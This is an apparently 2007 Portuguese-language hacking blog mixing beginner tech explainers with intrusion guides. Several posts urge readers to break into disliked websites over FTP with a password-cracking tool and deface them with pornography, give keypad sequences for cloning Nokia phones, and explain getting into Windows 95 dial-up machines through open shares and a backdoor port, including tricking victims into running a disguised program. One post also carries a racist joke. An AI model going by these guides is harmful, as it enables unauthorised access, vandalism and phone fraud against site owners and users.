sexta-feira, 21 de dezembro de 2007

Como invadir Uma Hp ?? Tiu Black ensina ;)

Por acaso você já entrou em um site e o odiou? Você já tem a solução, invada-o! Você já pensou que legal você mudando o conteúdo de um site! Você pega um site de uma escola que você não gosta e coloca um monte de fotos pornôs!

Você, em primeiro lugar, deve saber o endereço FTP de um site que normalmente são assim: ftp.xxxx.com (ou .br, .pt etc.) ou você pode fazer uma invasão por IP! Você pega o IP do site e ao invés de usar o endereço FTP, use o IP! Para descobrir o IP do site, vá ao Prompt do Dos e digite: Ping www.xxxx.com (você substitui o xxxx pelo endereço). Vão aparecer várias coisas escritas e na primeira linha, vai aparecer assim: Disparando contra [O IP] e mais um monte de coisas inúteis.

Agora você precisa saber a senha, então, pegue o programa unsecure em alguma outra página. Este Unsecure é um descobridor de senhas. Você coloca nele o endereço FTP ou o IP do site a ser invadido que ele te manda a senha e o usuário ! Se você souber o usuário, você coloca que ele te manda só a senha! Entre no Link para saber mais! Faça o download do Unsecure e mande bala!

Agora, chegou a grande hora! A invasão! Você, a princípio, vai usar o método mais fácil entre os vários métodos existentes. Você vai usar o FTP do Dos. Ele é considerado mais fácil porque os comandos são mais fáceis. Você deve digitar ftp na linha de comando do Prompt do Dos e ele vai aparecer assim: ftp>. Daí você digita open e ele vai aparecer assim: to> (ou para> depende da versão do programa) e aí é só digitar o endereço ou o IP do site, o usuário, a senha e BUUUMMM!!!!!!!! Agora faça o que você quiser!!!!

Aí vão alguns comandos do FTP:

get nomedoarquivo.extensão - para pegar arquivos

put nomedoarquivo.extenção - para colocar arquivos

delete nomedoarquivo.extenção - deletar arquivos

Obs. 1: Se você quiser invadir uma página que tem o hospedeiro como o XOOM por exemplo, você primeiro tem que invadir o XOOM para depois invadir o site.

Obs. 2: Não conseguiu? Vá para outra página.. Eu não sou o autor deste texto. (AUTOR DESCONHECIDO), então não me mande e-mail´s bobos perguntando como invadir, que eu não responderei! Obrigado!

BAIXE AQUI O UNSECURE: http://www.esquemadf.xpg.com.br/unsecure.zip


issu é uma das caracteristicas de como fazer uma invasao ftp, das muitas que se existem .. cuidado com o q iram fazer eu nao me responsabilizo por nada q vc fizer .... Soul Black

quinta-feira, 30 de agosto de 2007

O que é ह्त्म्ल ?

Chegou o momento de falar sobre HTML, a linguagem com que se criam as páginas web.


HTML é uma linguagem com a qual se definem as páginas web. Basicamente trata-se de um conjunto de etiquetas (tags) que servem para definir a forma na qual se apresentará o texto e outros elementos da página.

O HTML se criou a princípio com objetivos de divulgação. Porém, não se pensou que a web chegaria a ser uma área de ócio com caráter multimídia, de modo que, o HTML se criou sem dar respostas a todos os possíveis usos que lhe dariam posteriormente e a todo coletivo de gente que o utilizariam no futuro. Entretanto, frente a este deficiente planejamento, com o tempo, foram se incorporando modificações as quais são os padrões (standards) do HTML. Numerosos padrões já se apresentaram. O HTML 4.01 foi o último padrão feito até o mês de abril de 2004.

O HTML é uma linguagem de programação muito fácil de aprender, o que permite que qualquer pessoa, mesmo que nunca tenha programado possa enfrentar a tarefa de criar um website. O HTML é fácil e em pouco tempo poderemos dominar sua linguagem. Mais adiante, conseguiremos os resultados profissionais graças as nossas capacidades para o desenho e a nossa veia artística.

Uma vez conhecendo o conceito do HTML, vamos adiantar mais algumas coisas. Esta linguagem se escreve em um documento de texto, por isso necessitamos de um editor de textos para escrever uma página web. Sendo assim, o arquivo onde está contido o código HTML é um arquivo de texto com uma peculiaridade, que tem uma extensão .html ou .htm (é indiferente qual deles utilizar). De modo que quando programarmos em HTML, o faremos com um editor de texto, o mais simples possível e salvaremos nossos trabalhos com extensão .html, por exemplo: minhapagina.html.

Para adiantar um pouco mais como se utiliza o HTML, diremos que a linguagem consta de tags que são etiquetas que tem esta forma ou

. Cada etiqueta significa uma coisa , por exemplo: significa que se escreve em negrito (bold) ou

significa um parágrafo, é um link, etc. Quase todas as etiquetas têm sua correspondente etiqueta de fechamento, que indica que a partir desse ponto a etiqueta não vai se alterar. Por exemplo, se utiliza para indicar que se deixe de escrever em negrito. Portanto, o HTML não é mais do que uma série de tags que se utilizam para definir a forma ou o estilo que queremos aplicar em nosso documento. Ou seja, isto está em negrito.

Para aprender HTML em profundidade temos um manual em Criarweb.com. Ademais, podem ser consultados os links a distintos manuais e artigos que temos em nosso buscador na sessão de HTML.
Se o que desejamos é ter uma idéia global do que é a publicação na Internet e os passos a seguir para colocar nossas páginas na web, o mais adequado será consultar o manual Desde Zero.

O que é जावा ?

Descrição e características desta potente e moderna linguagem de programação.


Java é uma linguagem de programação com a qual podemos realizar qualquer tipo de programa. Na atualidade, é uma linguagem muito extensa e cada vez cobra mais importância no âmbito de Internet como na informática em geral. Está desenvolvido pela companhia Sun Microsystems com grande dedicação e sempre enfocada a cobrir as necessidades tecnológicas mais principais.
Uma das principais características pelas quais Java se tornou tão famoso é que é uma linguagem independente da plataforma. Isto quer dizer que se fazemos um programa em Java poderá funcionar em qualquer computador do mercado. É uma vantagem significativa para os desenvolvedores de software, pois antes tinham que fazer um programa para cada sistema operativo, por exemplo Windows, Linux, Apple, etc. Isto se consegue porque foi criado uma Máquina de Java para cada sistema que faz de ponte entre o sistema operativo e o programa de Java e possibilita que este último se entenda perfeitamente.

A independência de plataforma é uma das razões pelas quais Java é interessante para Internet, já que muitas pessoas devem ter acesso com computadores distintos. Mas não fica por aí, Java está desenvolvendo inclusive distintos tipos de dispositivos ademais do computador como celulares, agendas e em geral para qualquer coisa que a indústria possa inventar.

Passado e presente

Java foi pensado originalmente para se utilizar em qualquer tipo de eletrodoméstico, mas a idéia fracassou. Um dos fundadores de Sun resgatou a idéia para utilizá-la no âmbito da Internet e converteram a Java em uma linguagem potente, segura e universal graças por ser gratuito e por poder utilizar todo mundo. Um dos primeiros triunfos de Java foi que se integrou no navegador Netscape e permitia executar programas dentro de uma página web, até então impensável com o HTML.

Atualmente Java é utilizado em um amplo leque de possibilidades e quase qualquer coisa que se pode fazer em qualquer linguagem pode ser feito também em Java e muitas vezes com grandes vantagens. Para o que nos interessa, com Java podemos programar páginas web dinâmicas, com acesso à base de dados, utilizando XML, com qualquer tipo de conexão de rede entre qualquer sistema. Em geral, qualquer aplicação que desejarmos fazer com acesso através web se pode fazer utilizando Java.

Conclusão

Java é tão grande que se quisermos fazer coisas complicadas não poderemos aprender tudo através dos tutoriais on-line e precisaríamos de livros e cursos. A página de Java de Sun é sem dúvida a melhor referência, mesmo sendo um pouco avançada para os que começam, é a referência mais útil para os que necessitam se documentar para algo em.

By : Soul Black

O que é ओराक्ले ?

Oracle é uma potente ferramenta cliente/servidor para a gestão de Bases de Datos. Explicamos a ferramenta e as ajudas que oferece ao desenvolvedor.


Oracle é basicamente uma ferramenta cliente/servidor para a gestão de Bases de Dados. É um produto vendido a nível mundial, embora a grande potência que tem e seu elevado preço, faz com que só se veja em empresas muito grandes e multinacionais, por norma geral. No desenvolvimento de páginas web acontece o mesmo: como é um sistema muito caro não está tão espalhado como outras bases de dados, por exemplo, Access, MySQL, SQL Server, etc.

Vamos agora centrarmos no que é Oracle exatamente e como funciona a programação sobre este. Oracle como antes foi mencionado se baseia na tecnologia cliente/servidor, portanto, para sua utilização primeiro, seria necessário instalar a ferramenta servidor (Oracle 8i) e posteriormente poderíamos atacar à base de dados desde outras máquinas com ferramentas de desenvolvimento como Oracle Designer e Oracle Developer, que são as ferramentas básicas de programação sobre Oracle.

Para desenvolver em Oracle utilizamos PL/SQL uma linguagem de 5ª geração, bastante potente para tratar e gerenciar a base de dados, também por norma geral costuma-se utilizar SQL ao criar um formulário.

Referência: Podemos aprender o que é a linguagem SQL em um artigo de CriarWeb.com.

É possível logicamente atacar a base de dados através do SQL plus incorporado no pacote de programas Oracle para poder realizar consultas, utilizando a linguagem SQL.

O Developer é uma ferramenta que nos permite criar formulários em local, ou seja, mediante esta ferramenta nós podemos criar formulários, compilá-los e executá-los, mas se quisermos que os outros trabalhem sobre este formulário deveremos copiá-lo regularmente em uma pasta compartida para todos, de modo que, quando quiserem realizar uma mudança, deverão copiar de tal pasta e logo voltar a subir à pasta. Este sistema como podemos observar é bastante complicado e pouco confiável, pois é normal que as versões percam e se insistam com freqüência. A principal vantagem desta ferramenta é que é bastante intuitiva e dispõem de um modo que nos permite compor o formulário, tal e como o faríamos em Visual Basic ou em Visual C.

Os problemas anteriores estão totalmente resolvidos com Designer que é uma ferramenta que se conecta à base de dados e portanto, criamos os formulários nela, desta maneira todo mundo se conecta mediante Designer à aplicação que contem todos os formulários e não há problemas de diferentes versões, isto é muito útil e perfeito para evitar massacrar o trabalho de outros. Mas, o principal e mais notável problema é a falta de um meio visual para desenhar o formulário, ou seja, nos aparece uma estrutura como de árvore na qual inserimos um formulário, e ao mesmo tempo dentro deste inserimos blocos ou módulos que são as estruturas que conterão os elementos dos formulários, que podem estar baseados em tabelas ou não.

Portanto, se quisermos fazer formulários para praticar ou para provar o que é isto de Oracle, recomenda-se que se use Developer, pois é muito mais fácil e intuitivo à princípio.

By : Soul Black

Clonando Celular NOKIA

ANTES DE MAIS NADA QUERO DIZER A PALAVRA "CLONAGEM" ESTA EXPRESSA DE UM

MODO COMPARATIVO COM RELAÇÃO A CLONAGEM VERDADEIRA. OU SEJA, O QUE VAMOS

FAZER É SIMPLESMENTE REPROGRAMAR NOSSO CELULAR PARA QUE ATUE COMO OUTRO.





CLONAGEM:

--------



ANTES DE CLONAR NOSSO TELEFONE TEMOS QUE TER 3 COISAS FUNDAMENTAIS PARA

O BOM FUNCIONAMENTO:



CÓDIGO DE ÁREA

ID

MIN (NÚMERO INTERNO DO APARELHO MÓVEL)





CÓDIGO DE ÁREA:

--------------

ESTE CÓDIGO É DESIGNADO PARA CADA CIADADE DE CADA PAÍS.





SYSTEM ID:

--------

IDENTIFICAÇÃO DO SISTEMA, ESTE É UM NÚMERO DE 5 DIGITOS, OU SEJA:



POR EXEMPLO: 52693





MIN

---

ESTE NÚMERO É SIMPLESMENTE O NÚMERO DO CELULAR.







CLONANDO CELULARES NOKIA

-----------------------

MODELOS - 21XX, 51XX, 61XX, 636, 639, 918.



1) PRESSIONE *#639#

2) PRESSIONE O NÚMERO DO CELULAR DE 10 DÍGITOS, PRESSIONE OK

3) TECLE O sys id, PRESSIONE OK

4) O TELEFONE SERÁ RELIGADO



MODELOS - P1000, 100, PT101, PT128, PT228, PT232.



1) LIGUE O TELEFONE

2) PRESSIONE *3001#12345

3) A TELA MARCA 00

4) MANTENHA PRESSIONADO CLR UNS SEGUNDOS

5) TELCE O NÚMERO DE CELULAR DE 10 DÍGITOS

6) PRESSIONE store, 02, CLR (POR ALGUNS SEGUNDOS)

7) PONHA O sys id

8) PRESSIONE *1*10333*05*05, PRESSIONE store

9) PRESSIONE 03, PRESSIONE store

10) PRESSIONE CLR

11) DESLIGUE O TELEFONE PARA TERMINAR A PROGRAMAÇÃO.





MODELOS - 232, 239, 515.



1) PONHA *3001#12345, PRESSIONE STO 00

2) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 beeps)

3) PONHA 911#5551212#0 * 12345, STO, 01, STO

4) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 bepps)

5) PONHA O CÓDIGO DA ÁREA E O NÚMERO DO TELEFONE, PRESSIONE STP, 01, STO

6) PRESSIONE E MANTENHA PRESSIONADO CLR (2 beeps)

7) PRESSIONE *1*1 *333*15*05# 0111 * 1 ,STO, 01, STO

8) PRESSIONE E MATENHA PRESSIONADO CLR (2 beeps)

9) DESLIGUE E LIGUE O APARELHO.

Credits: devils ^^

quarta-feira, 25 de julho de 2007

+ Crimes e Penas +

Ação: Enviar mensagem alarmante, como a da existência de um novo vírus, e recomendar a retransmissão do arquivo para o maior número de pessoas possível, causando sobrecargas em sistemas como o do ICQ.
Pena: detenção de 3 meses a 1 ano ou multa (correspondente ao art.146; constrangimento ilegal)

Ação: Enviar e-mail com ameaça de agressão.
Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.147; ameaça)

Ação: Abrir e-mail alheio sem autorização.
Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.151; violação de correspondência)

Ação: Invadir um computador e apagar os dados ou enviar um vírus pela Internet
Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.163; dano)

Ação: Fazer compras na rede com números falsos de cartão de crédito ou outro documento.
Pena: reclusão de 1 a 5 meses ou multa (correspondente ao art.171; estelionato)

Ação: Colocar fotos de sexo explícito ou pedofilia em uma home page.
Pena: detenção de 6 meses a 2 anos ou multa (correspondente ao art.234; escrito ou objeto obsceno)

Ação: Montar sites com receitas de bombas ou ensinamentos de como destruir carros.
Pena: detenção de 3 meses a 6 meses ou multa (correspondente ao art.286; incitação ao crime)

Cuidado Tudo Contido Nesse Site E por Sua Conta E Responsa so queremos q os internautas se informem além do normal (Y)

+ O que é Hacker +

No jargão da informática, hacker é um termo digno. Hacker seria "fuçador" e o verbo to hack, "fuçar". Os estudantes do Instituto de Tecnologia de Massachusetts (MIT) usavam o termo "rato de laboratório" para designar aqueles que "fuçavam" nos computadores da Universidade, além dos limites de uso.

Devemos antes de tudo informar que um hacker é um sabichão. Justamente por saber muito, ele tem condições de "aprontar" por aí. O hacker sempre quer aprender mais um pouco e normalmente acaba perdendo horas de sono por isso. É aquele que tem prazer em sentar à frente de seu micro e ficar horas e horas buscando nem sabe o quê. Naturalmente xereta, o hacker adora invadir sistemas alheios para simplesmente preencher seu ego. Muitas de suas façanhas podem ser discutíveis ao nível social, mas o verdadeiro hacker não costuma estragar nada, subtrair programas, ou sequer roubar informações em detrimento de outrem. O hacker é, acima de tudo, um intelectual informatizado. Um cracker, este sim, é o que utiliza suas habilidades em proveito próprio, não importando quantos ou quais prejuízos cause. Este é um elemento perigoso, que muitas vezes acaba por se autodestruir. Normalmente coloca vírus em computadores, descobre senhas para vender a empresas, destrói informações, corrompe sistemas e apronta tudo que pode. Os hackers são basicamente feras da informática, que adoram aprender como os sistemas funcionam externa e principalmente internamente. Algumas pessoas os definem como desordeiros e pessoas más. Na verdade os verdadeiros hackers não são anjos, mas não saem por aí invadindo outros sistemas, causando danos ou espionando as informações dos outros. Não há magia no que eles fazem. A maioria das informações pode ser encontrada na lnternet.

Os hackers existem desde o final da década de 50. A palavra começou a ser usada na época, pelos membros mais entusiastas do Tech Model Rail Club, do Instituto de Tecnologia de Massachusetts (MIT). Seu significado: gente que era capaz de proezas técnicas, de ligar fios e plugar circuitos como ninguém. A cultura subterránea do computador se apropriou do termo e consagrou-o como sinônimo de programador prodígio. Se você perguntar a

gente como Steve Wozniak, criador do Apple, ou Linus Torvalds, pai do Linux, se eles se consideram hackers, é provável que fique surpreso ao ouvir um sim como resposta. Por que, então, tamanha histeria contra os hackers?

A primeira vez que a palavra foi usada como conotação negativa foi em uma reportagem da rede de TV CBS, em 1988, sobre a conferência hacker. O âncora Dan Rather alertava a audiência para a ameaça dos hackers, como se eles fossem um bando de terroristas prestes a dominar o mundo, em uma conspiração para invadir todos os computadores da Terra. Tal fantasia ganhou eco nos romances de ficção científica cyberpunk de escritores como William Gibson (autor de Neuromancer, que por sinal, foi o primeiro a cunhar a expressão ciberespaço) ou Bruce Sterling. De uma hora para outra, os hackers se transformaram em bode expiatório de tudo o que a tecnologia pôde causar de mau e que não é pouco.

O real mundo dos hackers revoltou-se. A comunidade hacker até criou um termo para identificar aqueles que usam computadores para violar leis, furtar e prejudicar terceiros: crackers. Mas foi em vão. Dai em diante, a imprensa foi incapaz de distinguir em cada artigo crackers de hackers e, a cada dia que passa, a fronteira ética que separa um do outro é ignorada. Pena. Pena porque os princípios consagrados pela ética hacker desde a década de 50, parecem cada dia mais atuais e poderiam ser úteis para muita gente que se preocupa como o mundo será no novo milênio.

Lista de Portas " A CASO SE VC FOR INFECTADO DA UMA OLHADINHA AKI

Esta lista é útil para aquelas pessoas que estão infectadas com algum trojan e não sabem qual seu nome, bastando apenas saber em qual porta ele está agindo.

Abaixo está a lista das portas-padrão utilizadas pelos trojans mais conhecidos para Windows NT, 95, 98:
Porta 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
Porta 23 - Tiny Telnet Server
Porta 25 - Antigen, Email Password Sender, Haebu Coceda, Terminator, Shtrilitz Stealth, WinPC, WinSpy
Porta 31 - Hackers Paradise, Master's Paradise 8
Porta 121 - BO jammerkillahV
Porta 456 - Hackers Paradise
Porta 555 - Ini-Killer, Phase Zero, Stealth Spy
Porta 666 - Satanz Backdoor, Attack FTP
Porta 1001 - Silencer, WebEx
Porta 1011 - Doly Trojan
Porta 1033 - NetSpy
Porta 1080 - Wingate (Socks-Proxy)
Porta 1170 - Psyber Stream Server, Voice, Streaming Audio Trojan
Porta 1234 - Ultors Trojan
Porta 1243 - SubSeven
Porta 1245 - VooDoo Doll
Porta 1492 - FTP99CMP
Porta 1509 - Psyber Streaming Server
Porta 1600 - Shivka-Burka
Porta 1807 - SpySender
Porta 1981 - Shockrave
Porta 1999 - BackDoor
Porta 2001 - Trojan Cow
Porta 2023 - Ripper
Porta 2115 - Bugs
Porta 2140 - Deep Throat, The Invasor
Porta 2565 - Striker
Porta 2583 - WinCrash 2.0
Porta 2801 - Phineas Phucker
Porta 3024 - WinCrash
Porta 3129 - Masters Paradise
Porta 3150 - Deep Throat, The Invasor
Porta 3700 - Portal of Doom
Porta 4590 - ICQTrojan
Porta 4950 - IcqTrojen
Porta 5000 - Sockets de Troie
Porta 5001 - Sockets de Troie
Porta 5321 - Firehotcker
Porta 5400 - Blade Runner
Porta 5401 - Blade Runner
Porta 5402 - Blade Runner
Porta 5569 - Robo-Hack
Porta 5742 - WinCrash
Porta 6400 - The tHing
Porta 6670 - DeepThroat
Porta 6771 - DeepThroat
Porta 6883 - DeltaSource
Porta 6939 - Indoctrination
Porta 6969 - GateCrasher, Priority
Porta 7000 - Remote Grab
Porta 7300 - NetMonitor
Porta 7301 - NetMonitor
Porta 7306 - NetMonitor
Porta 7307 - NetMonitor
Porta 7308 - NetMonitor
Porta 7789 - ICKiller
Porta 9872 - Portal of Doom
Porta 9873 - Portal of Doom
Porta 9874 - Portal of Doom
Porta 9875 - Portal of Doom
Porta 9989 - iNi-Killer
Porta 10067 - Portal of Doom
Porta 10167 - Portal of Doom
Porta 11000 - Senna Spy
Porta 11223 - Progenic trojan
Porta 12223 - Hack´99 KeyLogger
Porta 12345 - GabanBus, NetBus
Porta 12346 - GabanBus, NetBus
Porta 12361 - Whack-a-mole
Porta 12362 - Whack-a-mole
Porta 16969 - Priority
Porta 20001 - Millennium
Porta 20034 - NetBus 2 Pro, NetRex Pro
Porta 21544 - GirlFriend
Porta 22222 - Prosiak 0.47
Porta 23456 - Evil FTP, Ugly FTP, WhackJob
Porta 26274 - Delta
Porta 30029 - AOLTrojan1.1
Porta 30100 - NetSphere
Porta 30303 - Sockets de Troie 2.5
Porta 30999 - Kuang
Porta 31337 - Back Orifice
Porta 31338 - Back Orifice, DeepBO
Porta 31339 - NetSpy DK
Porta 31666 - BOWhack
Porta 31787 - Hack'a'tack
Porta 33333 - Prosiak
Porta 34324 - BigGluck, TN, Tiny Telnet Server
Porta 40412 - The Spy
Porta 40421 - Master's Paradise
Porta 40422 - Master's Paradise
Porta 40423 - Master's Paradise
Porta 40426 - Master's Paradise
Porta 47262 - Delta
Porta 50505 - Sockets de Troie
Porta 50766 - Fore
Porta 53001 - Remote Windows Shutdown
Porta 61466 - Telecommando
Porta 65000 - Devil

By : Soul Black

INVASÃO POR DIAL-UP

Invadindo usários de Windows 95 que utilizam a rede Dial Up com uma conexão PPP Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial Up com uma conexão PPP, o Windows é um dos maiores motivos de piadas entre os portugueses, negros e o Rubinho Barriquelo. Mesmo que vc não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se vc estiver utilizando esse tipo de conexão. Para esta "receita de bolo" funcionar, vc tem que estar usando a rede Dial Up e uma conexão PPP. Antes de tudo verifique se vc possui os drivers de clientes da microsof. Caso não estejam instalados, instale-os através do painel de controle no ícone redes. Verifique tb, se o compartilhamento de arquivos e impressoras está instalado Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifiqueas propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No casode você não conhecer nenhum servidor WINS, utilize 204.118.34.6como primário e 204.118.34.11 como secundário. Esses servidoressão dos USA, e gratuítos. Caso queira outros endereços,utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se atámesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS.É nesse arquivo que ficarão os endereços de IP e osnomes dos computadores que você terá acesso. Para localizarum determinado computador, você digita o seu número de IPe a seguir seu NetBios, na mesma linha, separados por um espaço.Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computadorsempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador. Invadindo pela porta 666 Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa. Invadindo pelo IP da vitíma A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede microsoft instalada. Se vc não esta com a rede microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em microsoft e escolha cliente p/ rede microsoft. Caso vc não ache esses nomes va em com disco precure lá. Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. La vá em propiedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do windows, ambiente de rede, e toda a rede. Assim q vc clicar em toda a rede o CPU do cara aparecera la. Lembresse q isso só dará certo se vc conectar via dial-up pelo Win95, ppp. Caso contrario não funcionara, e q também só dá certo se o compartilhamento de dados e impressão estiver ligado. É lógico q há maneiras de burlar isso, mas é perciso manja de alguma lingugem. (vc pode fazer uma linha de comando no windows q vai até o compartilhamento e liga e passar esse programa para o cara dizendo q é outra coisa, o unico prblema é q ele tem q reiniciar o CPU, mas ha modos para mudar isso também)

By : Soul Black

Resumidamente de varias bibliografias colokarei a disposiçao um poko da cultura "HACKER "

Cyberpunks reais



Dentro dessa grande tribo underground existem subdivisões. Grupos distintos que se afinam de acordo com o estilo de vida, pensamentos, vontades, interesses, dentre outros aspectos. Ja abordamos essas tribos da cibercultura em outro trabalho[16]. Neste artigo vamos apenas retomar algumas características dos hackers, já que estes foram objeto da última etapa da nossa investigação.



Podemos dizer que os hackers procuram o prazer, a diversão, o conhecimento e a comunicação sem restrições através do uso intensivo das tecnologias do ciberespaço. Eles são hoje porta-voz das principais questões que cercam a cibercultura contemporânea, a saber, a invaão da privacidade, as tentativas de censura, a disseminação de softwares livres, os debates sobre direito autoral e a falta de segurança nas redes, acarretando até o perigo de ciberguerras[17]. O slogan destes ciber-rebeldes está diretamente relacionado com a crítica ao desenvolvimento tecnológico da modernidade.



“O discurso parece ser: queremos o ciberespaço mas não o Rwindow$, queremos Internet, mas não vigilância eletrônica e spams, queremos informação livre, mas não sites inseguros que possam ferir a nossa privacidade, etc...”[18]





Hackers



Antes de analisarmos as ações dos hackers brasileiros devemos definir bem o conceito já que o mesmo é recheado de controvérsias. Vejamos assim algumas definições[19] dadas ao termo, extraídas do fanzine eletrônico “Barata Elétrica”, de autoria do ex-hacker brasileiro Derneval Cunha[20]:



“:hack: 1. n. Originalmente, um trabalho rápido que produz o que se precisa, um acochambramento 2. n. Uma peça de trabalho incrivelmente boa, consumidora de muito tempo e que produziu exatamente o esperado. 3. vt. agüentar física ou mentalmente um estado 4. vt. Trabalhar em um programa. Num sentido imediato: “O que vocês estão fazendo?” “Estou hackeando TECO” ("What are you doing?" "I'm hacking TECO."). 5. vi. interagir com um computador numa forma lúdica e exploratória ao invés de direcionada por um objetivo. "Que você esta' fazendo?" "Nada, só hackeando (fuçando)". 6. n. Diminutivo para {hacker} (fuçador, rato de laboratório).

:hack mode: n. 1. Quando está fuçando ou hackeando, claro. 2. Mais especificamente, um estado de concentração tipo Zen onde a mente esta' totalmente focalizada n*O Problema* que pode ser resolvido apenas quando se está hackeando (todos os hackers são meio místicos).

:hack value: n. Sempre usado como a motivação para o esforço cada vez maior na direção de um objetivo que é a fuçada (hack). Como um grande artista uma vez disse: "Se você tem que perguntar nunca vai descobrir".

:hacked up: adj. (fuçado) remendado o suficiente para as costuras começarem a atrapalhar o funcionamento do programa. Se as modificações são bem feitas, o software pode ser melhorado.

:hacker: [originalmente uma pessoa que fazia moveis com 1 machado] n. 1. Uma pessoa que adora explorar os detalhes de sistemas programáveis e como alargar suas capacidades, em oposição à maioria dos usuários, que preferem aprender o mínimo necessário. 2. Alguém que programa entusiasticamente (chegando à obsessão) ou que prefere programar ao invés de teorizar programação. 3. Uma pessoa capaz de apreciar ‘hack value’. 4. Uma pessoa boa na programação rápida. 5. Um perito num programa específico ou que trabalha freqüentemente com ele; como na denominação 'UNIX hacker'. 6. Um especialista de qualquer tipo. Pode-se ser um astronomy hacker. 7. Alguém que adora o desafio de superar ou usar jogo de cintura para superar limitações.

hacker ethic, the: n. 1. A crença de que a troca de informações é uma virtude poderosa e que os hackers devem mostrar sua proeza escrevendo software gratuito e facilitando o acesso à informação sempre que possível. 2. A crença de que fuçar um sistema (vasculhar, penetrar) é OK desde que o hacker não cometa roubo, vandalismo ou quebra de confiança. A maioria aceita o primeiro principio e muitos agem de acordo, escrevendo software e distribuindo por ai. Alguns vão além e afirmam que *toda* informação deveria ser gratuita e *qualquer* controle proprietário é mal. No entanto, algumas pessoas consideram o ato de cracking (entrar em sistemas) uma coisa fora da ética, tipo invasão da privacidade. O principio pelo menos modera o comportamento de gente que se vê como "hackers benignos". A maior manifestação de qualquer uma das versões da ética do hacker é o fato de todos os hackers estarem ativamente interessados em partilhar truques, software e quando possível, recursos de computação como outros hackers.”



Todas estas definições[21] são utilizadas para classificar, designar, definir e, principalmente, entender o que é ser um hacker. Além de qualquer definição, podemos dizer que os hackers são os responsáveis pelas principais tecnologias da cibercultura, alinhavando também as prinicipais questões da cultura contemporânea, as questões morais e éticas da sociedade informacional. Os hackers criaram a microinformática, deram forma a Internet, desenvolveram softwares de código aberto, criam senso de comunidade cooperativa, lutam pela liberdade de informação, pelo respeito a privacidade e contra a censura no ciberespaço. Como veremos, os nossos hackers limitam-se, na maioria das vezes em lançar protestos invadindo e desfigurando páginas. Há também aqueles, menos mediáticos mas não menos importantes, que militam pelos direitos dos cidadãos no ciberespaço.



Esses ativistas eletrônicos agem de várias formas, onde as mais espetaculares são efetivamente a invasão de sítios. Eles têm como principal objetivo entrar em páginas ou computadores de empresas, instituições do governo, bancos, para deixar mensagens de protesto ou detectar possíveis falhas e deficiências no sistema e mostrá-las para seus responsáveis como forma de alerta. O hacker divulgam práticas que vão se extendendo a todos os internautas como lutar contra a censura, contra os spams, contra o mito da segurança, contra a invasão do e-business, contra as derrapagens políticas, etc. Isto constitui o que muitos autores chamam de tecno-anarquismo:



“O tecno-anarquismo (grupos como Legion of Doom, Hacktic, CCC, L0ft, entre outros) é uma forma de negação do poder da tecnocracia e uma maneira de afirmar, de forma positiva, a vitalidade social através das novas tecnologias. O intenso e imediato prazer em tempo real, o desprezo pelo futuro, a aventura e a conquista de novos territórios simbólicos, a anarquia do ciberespaço, as agregações sociais, todas características da cibercultura, mostram o vitalismo social contemporâneo no coração da tecnologia digital.”[22]



Os hackers são bem diferentes dos marginais ou vândalos da informática –os crackers. O termo foi criado pelos próprios hackers como forma de diferenciação dos marginais da cibercultura, embora não maioria das vêzes a imprensa e a mídia em geral não faça essa distinção, aumentando a má compreensão desses personagens da sociedade informacional. Além de alertar as autoridades competentes de que seus sistemas não estão seguros, e sim passíveis de ataques por parte de pessoas mal intencionadas, eles revelam o papel que as novas tecnologias de informação desempenham na sociedade globalizada. Vejamos alguns depoimentos:



“Eu acredito que toda informação útil em geral deve ser livre. Por ‘livre’ eu não estou me referindo a um preço, mas sim a liberdade de copiar a informação e adapta-la de acordo com o uso de cada um. Por ‘útil em geral’ eu não incluo informações confidenciais que dizem respeito a cada indivíduo ou informações relativas a cartões de crédito”, Richard Stallman, fundador da Free Software Foundation… [23]



“O hacker vê um protocolo de segurança e tira vantagens dele porque ele está lá acessível para ele, não para destruir informação ou roubar. Eu acho que nossas atividades, ações deveriam ser comparadas a de alguém que está descobrindo métodos de como adquirir informações em uma biblioteca e começa a ficar excitado ou talvez obsessivo com isso.”[24]



“Hackers possuem um conhecimento básico sobre computadores e isso é exatamente o que eles podem sentir prazer. Não conheço ninguém que ‘hackeia’ por dinheiro ou para amedrontar uma empresa, ou por qualquer outra coisa que não seja diversão.”[25]



